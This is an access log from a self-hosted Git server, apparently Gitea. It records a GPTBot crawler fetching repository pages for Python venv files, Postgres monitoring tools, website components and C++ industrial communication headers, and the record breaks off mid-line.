+[17/Feb/2026:17:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:17:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 12982] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:17:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:17:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 22017] [Gzip 6.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:17:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11527] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:17:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11574] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:17:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11516] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11082] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13014] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:17:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:17:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11555] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:17:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11050] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19873] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:17:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11562] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:17:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:17:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:17:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:17:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:17:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11541] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:17:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12145] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol?display=rendered" [Client 74.7.227.38] [Length 18429] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:17:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog?display=rendered" [Client 74.7.227.38] [Length 84461] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:17:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12833] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" +[17/Feb/2026:17:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostissues&state=all" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostissues&state=closed" +[17/Feb/2026:17:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13982] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" +[17/Feb/2026:17:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15602] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:10:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:17:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 12127] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:17:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcontroller.hpp" [Client 74.7.227.38] [Length 21504] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fitransport.hpp" [Client 74.7.227.38] [Length 25395] [Gzip 4.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fitransport.hpp" [Client 74.7.227.38] [Length 19350] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcontroller.hpp" [Client 74.7.227.38] [Length 24585] [Gzip 4.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcontroller.hpp" [Client 74.7.227.38] [Length 26252] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm" [Client 74.7.227.38] [Length 208936] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" +[17/Feb/2026:17:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm" [Client 74.7.227.38] [Length 83095] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" +[17/Feb/2026:17:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm" [Client 74.7.227.38] [Length 145303] [Gzip 14.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" +[17/Feb/2026:17:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp?display=source" [Client 